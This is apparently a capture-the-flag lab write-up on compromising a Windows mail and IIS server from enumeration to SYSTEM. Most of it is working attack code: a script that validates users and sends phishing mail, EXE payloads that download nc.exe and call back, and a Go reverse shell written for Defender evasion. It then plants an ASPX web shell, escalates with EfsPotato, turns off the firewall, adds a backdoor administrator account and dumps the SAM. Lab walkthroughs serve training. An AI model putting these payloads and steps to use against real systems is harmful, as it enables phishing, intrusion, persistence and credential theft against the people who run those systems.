# Evasive (Medium)

**Tags**: `#RedTeam` `#Windows` `#MailServer` `#DefenderBypass` `#EfsPotato` `#Phishing` `#WinRM` `#SeImpersonate`

### Objective and Scope <a href="#user-content-objective-and-scope" id="user-content-objective-and-scope"></a>

Conduct a small red team operation against a **Mail and Web Windows Server**.\
Goal: Gain system access and extract sensitive information usable by a threat actor

#### ⚠️ Rules of Engagement

* Mail component has an **anti-bruteforce mechanism** → Do not trigger lockout.
* **Microsoft Defender is active and up-to-date** → Expect detection & evasion challenges.

### Scanning -> Service Scanning

```
nmap -p- --min-rate 1000 -vv 10.1.205.194
```

<figure><img src="/files/wOCyENhS2LEZaFj3gQQn" alt=""><figcaption></figcaption></figure>

```
10.1.205.194 -> [25,80,110,139,143,135,445,587,3389,5985]
```

```
nmap -p25,80,110,139,143,135,445,587,3389,5985 -sC -sV 10.1.205.194

PORT     STATE SERVICE       VERSION
25/tcp   open  smtp          hMailServer smtpd
| smtp-commands: winserver01.hs, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
110/tcp  open  pop3          hMailServer pop3d
|_pop3-capabilities: USER UIDL TOP
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
143/tcp  open  imap          hMailServer imapd
|_imap-capabilities: IMAP4rev1 IDLE OK CAPABILITY QUOTA ACL NAMESPACE RIGHTS=texkA0001 IMAP4 SORT completed CHILDREN
445/tcp  open  microsoft-ds?
587/tcp  open  smtp          hMailServer smtpd
| smtp-commands: winserver01.hs, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2026-05-09T14:19:29+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=Winserver01
| Not valid before: 2026-05-08T13:38:19
|_Not valid after:  2026-11-07T13:38:19
| rdp-ntlm-info:
|   Target_Name: WINSERVER01
|   NetBIOS_Domain_Name: WINSERVER01
|   NetBIOS_Computer_Name: WINSERVER01
|   DNS_Domain_Name: Winserver01
|   DNS_Computer_Name: Winserver01
|   Product_Version: 10.0.20348
|_  System_Time: 2026-05-09T14:19:21+00:00
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: winserver01.hs; OS: Windows; CPE: cpe:/o:microsoft:windows
```

* **SMTP (25/587)** : hMailServer — supports `AUTH LOGIN PLAIN`
* **HTTP (80)** : IIS 10.0
* **POP3/IMAP** : hMailServer
* **SMB (445)** : Available
* **RDP (3389)** : Windows Server
* **WinRM (5985)** : HTTPAPI/2.0

### SMB Enumeration

```
nxc smb 10.1.205.194 -u guest -p '' --shares
```

<figure><img src="/files/RxpDAtYedUF1nqfNPkkf" alt=""><figcaption></figcaption></figure>

* We have a non-default share called `docs`, and we have read access to it.
* We also have read access to `IPC$`, so RID brute-forcing is possible.

Crawling the shares

```
nxc smb 10.1.205.194 -u guest -p '' --shares -M spider_plus
```

<figure><img src="/files/0fso2VAZJnp1rPBi4aT6" alt=""><figcaption></figcaption></figure>

* There are two files, both PDFs; let's download them:
  * `mail_doc.pdf`  `old_user_setup_doc.pdf`

<figure><img src="/files/eGriiaGcysSdM9SL1LZI" alt=""><figcaption></figcaption></figure>

* Opening `mail_doc.pdf`

<figure><img src="/files/1G99H3br3vgfIUQ4Rr7b" alt=""><figcaption></figcaption></figure>

* *Alfonso is expecting an **EXE file from ROGER** via email*

Opening `old_user_setup_doc.pdf`. It contains a password used when setting up new users.

<figure><img src="/files/r24Sqcb4iRqfa9FrJqt1" alt=""><figcaption></figcaption></figure>

```
nxc smb 10.1.205.194 -u guest -p '' --rid-brute | grep -i user
```

<figure><img src="/files/TmZsrH4cSlbRARkQEvkS" alt=""><figcaption></figcaption></figure>

Spraying that password over SMB against the RID-bruted user list didn't work:

```
nxc smb 10.1.205.194 -u user -p pass --continue-on-success
```

<figure><img src="/files/8C0JCNzDPHLFTVydW8lu" alt=""><figcaption></figcaption></figure>

But we know Alfonso is expecting an EXE via email, so perhaps these credentials are valid on the mail server instead.

### Enumerating Mail Server

<figure><img src="/files/KoHZPiHeXeWvn9bwBJEn" alt=""><figcaption></figcaption></figure>

hMailServer requires a **fully qualified address** (`user@winserver01.hs`) for authentication, and recipients can be validated with `RCPT TO`:

```
cat user
roger@winserver01.hs
alfonso@winserver01.hs
```

```
smtp-user-enum -M RCPT -U user -t 10.1.205.194
```

<figure><img src="/files/QkfWHlkQgxiSC08XhADT" alt=""><figcaption></figcaption></figure>

Both users are valid.

When we try to send mail, the server replies `530 SMTP authentication is required.`

```
swaks -t alfonso@winserver01.hs --from roger@winserver01.hs --attach @a --server 10.1.205.194 --body "Hey There Are you there" --header "Subject: Please Do Note Open This Email"
```

I guess I hit a limit on connection or sending attempts, because it now says…

```
*** Remote host closed connection unexpectedly.
```

I reset the lab. Recall the password from the new-user setup PDF in the `docs` share: with the year changed from 2024 to 2025, it authenticated successfully (`-ap` makes swaks prompt for the password instead of putting it on the command line).

```
swaks -t alfonso@winserver01.hs --from roger@winserver01.hs --attach @a --server 10.1.9.239  --body "Hey There Are you there" --header "Subject: Please Do Note Open This Email" -ap
```

I first sent a plain file (just the target hostname) as a test, and it was delivered; now we can craft an `.exe`.
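The two mail-server steps above, `RCPT TO` validation of the candidate users and the authenticated send with an attachment that swaks performed, as one added Python example. This is not code from the original write-up, nor what `smtp-user-enum` or `swaks` do internally. The server address and domain are taken from the scan; the `probe@` envelope sender, the two-second delay between probes, the placeholder password and the attachment file name are assumptions, and the "550 means unknown user" mapping should be checked against the reply text the server actually returns.

```python
"""Added example (not from the original write-up): the mail-server side of the
engagement in one script. RCPT TO user validation and the authenticated send
share one throttled SMTP session model so the lab's anti-brute-force mechanism
is not tripped. Delay, envelope sender, password and file name are assumptions."""
import smtplib
import time
from email.message import EmailMessage

SERVER = "10.1.205.194"          # from the write-up's nmap scan
DOMAIN = "winserver01.hs"        # hMailServer wants fully qualified addresses
PROBE_DELAY = 2.0                # assumption: seconds between RCPT probes


def classify_rcpt(code: int) -> str:
    """Turn an RCPT TO reply code into a verdict.

    2xx -> recipient accepted: the mailbox exists
    550 -> permanent rejection: unknown local user (assumed hMailServer reply)
    anything else (421, 450, 452, 530, ...) -> throttling, auth demanded or
    relay refused: stop probing instead of hammering the server.
    """
    if 200 <= code < 300:
        return "valid"
    if code == 550:
        return "invalid"
    return "backoff"


def enumerate_users(addresses, session, delay=PROBE_DELAY):
    """`session` is a connected smtplib.SMTP (or any object with the same
    mail/rcpt/rset methods). One MAIL FROM, then one RCPT TO per candidate,
    a pause between probes, and a hard stop at the first refusal that is not
    a plain 550, which is what keeps us clear of the lockout."""
    results = {}
    session.mail(f"probe@{DOMAIN}")          # assumed envelope sender
    for addr in addresses:
        code, _reply = session.rcpt(addr)
        verdict = classify_rcpt(code)
        results[addr] = verdict
        if verdict == "backoff":
            break
        time.sleep(delay)
    session.rset()                           # abandon the transaction cleanly
    return results


def build_phish(sender, recipient, subject, body, filename, payload: bytes):
    """Build what swaks built for us: a text body plus a binary attachment."""
    msg = EmailMessage()
    msg["From"] = sender
    msg["To"] = recipient
    msg["Subject"] = subject
    msg.set_content(body)
    msg.add_attachment(payload, maintype="application",
                       subtype="octet-stream", filename=filename)
    return msg


def send_authenticated(msg, username, password, server=SERVER, port=587):
    """Submission with AUTH (EHLO advertised LOGIN and PLAIN); without it
    hMailServer answers '530 SMTP authentication is required'."""
    with smtplib.SMTP(server, port, timeout=10) as smtp:
        smtp.ehlo("probe")
        smtp.login(username, password)       # smtplib picks PLAIN or LOGIN
        smtp.send_message(msg)


if __name__ == "__main__":
    candidates = [f"{u}@{DOMAIN}" for u in ("roger", "alfonso")]
    with smtplib.SMTP(SERVER, 25, timeout=10) as probe_session:
        probe_session.ehlo("probe")
        print(enumerate_users(candidates, probe_session))
    with open("l1nuxkid.exe", "rb") as fh:  # assumption: payload built earlier
        phish = build_phish(f"roger@{DOMAIN}", f"alfonso@{DOMAIN}",
                            "Please Do Not Open This Email",
                            "Hey, are you there?", "l1nuxkid.exe", fh.read())
    send_authenticated(phish, f"roger@{DOMAIN}", "PASSWORD_FROM_THE_PDF")
```

Keeping every probe inside one session with a single `MAIL FROM`, pausing between `RCPT TO`s and stopping at the first refusal that is not a plain 550 is the cheapest insurance against the lockout the rules of engagement warn about; it also mirrors how `smtp-user-enum -M RCPT` validates users without ever authenticating.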

<figure><img src="/files/StQDWPyvFzrycGz5PsYk" alt=""><figcaption></figcaption></figure>

* Now we need to craft an EXE, since `alfonso` is expecting one from us (`roger`).

### Phishing Attempt

* Since `alfonso` is waiting for an EXE from `roger`, why not send a reverse shell?

```
msfvenom -p windows/shell_reverse_tcp   LHOST=tun0 LPORT=9001   -f exe --platform windows -o github.exe
```

I sent it, but nothing came back. I started doubting myself, then re-read the lab description: Defender is on and up to date, and a stock msfvenom executable is among the first things it flags.

### Crafting a custom simple EXE

```
#include <stdlib.h>

/* Execution probe: no shellcode and no callback, just system() calls that
 * make the host ping the attacker box, so we can confirm the attachment was
 * opened and executed under Defender before sending anything noisier. */
int main (void)
{
  system ("ping 10.200.25.221");             /* ICMP beacon from cmd.exe */
  system ("whoami");
  system ("powershell ping 10.200.25.221");  /* same beacon via PowerShell */

  return 0;
}
```

```
x86_64-w64-mingw32-gcc test.c -o test.exe
```

<figure><img src="/files/SkXI8UMzRXNUPBXPIOYG" alt=""><figcaption></figcaption></figure>

```
swaks -t alfonso@winserver01.hs --from roger@winserver01.hs --attach @test.exe --server 10.1.9.239  --body "Hey There Are you there" --header "Subject: Please Do Note Open This Email" -ap
```

<figure><img src="/files/QSMDadmAWcDNb7YKIAWP" alt=""><figcaption></figcaption></figure>

We got the ping! Lesson learned: confirm execution with a harmless beacon before going straight for a reverse shell.

<figure><img src="/files/V4DGhrURNfYRAYZgD6ZL" alt=""><figcaption></figcaption></figure>

Now the question is how to turn that into a shell.

I tried downloading `nc.exe` and then executing it. Although it downloaded, it didn't give a reverse shell; `nc.exe` is a well-known tool, and Defender's real-time protection will normally quarantine it as soon as it is written to disk.

```
#include <stdlib.h>

/* Second attempt: fetch nc.exe from the attacker box and call back with it.
 * DownloadString only pulls text into memory (the original IEX one-liner
 * never wrote the binary to disk); DownloadFile saves it next to the probe. */
int main (void)
{
  system ("powershell -c \"(New-Object Net.WebClient).DownloadFile('http://10.200.25.221/nc.exe', 'nc.exe')\"");
  system ("whoami");
  /* a known-bad binary on disk is exactly what real-time scanning catches */
  system ("powershell .\\nc.exe 10.200.25.221 445 -e cmd");

  return 0;
}
```

<figure><img src="/files/EssU5RzchDQpLvigRtRO" alt=""><figcaption></figcaption></figure>

But still no shell.

I then used the 0xb0b method, a minimal Go reverse shell compiled for Windows, and it worked:

```
package main

import (
    "net"
    "os/exec"
)

// Minimal reverse shell: connect back and wire PowerShell's stdin, stdout and
// stderr straight to the socket. No staging and no known tooling dropped to
// disk, which is what kept it under Defender's radar here.
func main() {
    c, err := net.Dial("tcp", "10.200.25.221:443")
    if err != nil {
        return // listener not reachable: exit quietly instead of crashing
    }
    defer c.Close()

    cmd := exec.Command("powershell")
    cmd.Stdin = c
    cmd.Stdout = c
    cmd.Stderr = c
    cmd.Run()
}
```

```
GOOS=windows GOARCH=amd64 go build l1nuxkid.go
```

<figure><img src="/files/IJjMsN1lpfIUFiYnuA0W" alt=""><figcaption></figcaption></figure>

```
swaks -t alfonso@winserver01.hs --from roger@winserver01.hs --attach @l1nuxkid.exe --server 10.1.134.188  --body "Hey There Are you there" --header "Subject: Please Do Note Open This Email" -ap
```

### Shell as alfonso

* Finally it worked:

```
penelope -p 443
```

<figure><img src="/files/ZsGAeARySG6BMcTX31ls" alt=""><figcaption></figcaption></figure>

### Privilege Escalation > wwwroot

* Poking around, I came across `C:\inetpub\wwwroot` and found that we have write access to it.
* We can drop an ASPX shell there.

<figure><img src="/files/nUYUg0eggUz63VraDYVG" alt=""><figcaption></figcaption></figure>

{% embed url="https://gist.githubusercontent.com/qtc-de/19dfc9018685fce1ba2092c8e2382a79/raw/6d4df39b991b6fe54c606eee45483b17cdd09c4c/aspx-reverse-shell.aspx" %}

* I will use that ASPX reverse shell and an SMB server to transfer the file.
* Then I request it from the website as `abcd.aspx` and get a reverse shell on port 9090 as `DefaultAppPool`.

<figure><img src="/files/NXDj2Q8Py8ZPeZZ1ksCX" alt=""><figcaption></figcaption></figure>

* Gained a reverse shell as `DefaultAppPool`.

<figure><img src="/files/Hn7004Bmb6Cj71ipiIla" alt=""><figcaption></figcaption></figure>

* IIS application pool identities such as `DefaultAppPool` hold `SeImpersonatePrivilege` by default (confirm with `whoami /priv`). We cannot simply drop PrintSpoofer or a prebuilt Potato binary and run it: Defender is active and will almost certainly quarantine a known tool as soon as it is written.
* One option is EfsPotato. It is a single C# source file, so if a C# compiler is present on the target we can compile it there, and a freshly built binary has a better chance of going undetected than a published release.

We check for a compiler under `C:\Windows\Microsoft.Net\Framework\` and see that a v4.0 build is present. Nice.

```
dir C:\Windows\Microsoft.Net\Framework\
```

```
PS C:\inetpub\wwwroot> dir C:\Windows\Microsoft.Net\Framework\v4.0.30319\csc.exe
dir C:\Windows\Microsoft.Net\Framework\v4.0.30319\csc.exe


    Directory: C:\Windows\Microsoft.Net\Framework\v4.0.30319


Mode                 LastWriteTime         Length Name                                                        
----                 -------------         ------ ----                                                        
-a----          5/8/2021   8:16 AM        2141560 csc.exe 
```

Next, we download the source file from our attacker machine, compile it with the compiler found at `C:\Windows\Microsoft.Net\Framework\v4...`, and run it with `whoami` as the command to execute.

```
C:\ProgramData>C:\Windows\Microsoft.Net\Framework\v4.0.30319\csc.exe EfsPotato.cs -nowarn:1691,618
```

<figure><img src="/files/OH2O1C8sn8nAt4hTQyMH" alt=""><figcaption></figcaption></figure>

```
C:\ProgramData>.\EfsPotato.exe whoami
```

<figure><img src="/files/WvhKhYsEdc1kjsR6d7av" alt=""><figcaption></figcaption></figure>

Bingo, it worked!

Now, to get an interactive shell, I could reset the admin password, but first let's turn off the firewall.

```
C:\ProgramData>.\EfsPotato.exe "netsh advfirewall set allprofiles state off"
C:\ProgramData>.\EfsPotato.exe "netsh advfirewall show allprofiles"
C:\ProgramData>.\EfsPotato.exe "netsh advfirewall set allprofiles firewallpolicy allowinbound,allowoutbound"
```

```
State                                 OFF
```

```
.\EfsPotato.exe "net user l1nuxkid StrongPass@123 /add && net localgroup Administrators l1nuxkid /add && net localgroup "Remote Desktop Users" l1nuxkid /add && net localgroup "Remote Management Users" l1nuxkid /add && reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f && netsh advfirewall firewall set rule group="remote desktop" new enable=Yes && winrm quickconfig -q && netsh advfirewall firewall set rule group="windows remote management" new enable=Yes"
```

Oops, that exceeded the argument length limit; run them one at a time instead.

```
.\EfsPotato.exe "net user l1nuxkid StrongPass@123 /add"

.\EfsPotato.exe "net localgroup Administrators l1nuxkid /add"

.\EfsPotato.exe "cmd /c net localgroup \"Remote Desktop Users\" l1nuxkid /add"

.\EfsPotato.exe "cmd /c reg add \"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f"

.\EfsPotato.exe "cmd /c netsh advfirewall firewall set rule group=\"remote desktop\" new enable=Yes"

.\EfsPotato.exe "cmd /c winrm quickconfig -q"

.\EfsPotato.exe "cmd /c netsh advfirewall firewall set rule group=\"windows remote management\" new enable=Yes"

net user l1nuxkid
```

### Shell as l1nuxkid

```
evil-winrm -i 10.1.134.188 -u l1nuxkid -p 'StrongPass@123'
```

<figure><img src="/files/mvSUrdWfMHkbEAUbyp45" alt=""><figcaption></figcaption></figure>

### SAM Dump

* I am already a privileged user, but for the sake of formality I dumped the SAM database to get the Administrator hash. I could just as well have used PsExec to become `NT AUTHORITY\SYSTEM`.

```
nxc smb 10.1.134.188 -u l1nuxkid -p 'StrongPass@123' --sam
```

<figure><img src="/files/DqibFDsmtLCBC8SJjHiE" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/G23hcilgf8WCgmtN9TRN" alt=""><figcaption></figcaption></figure>

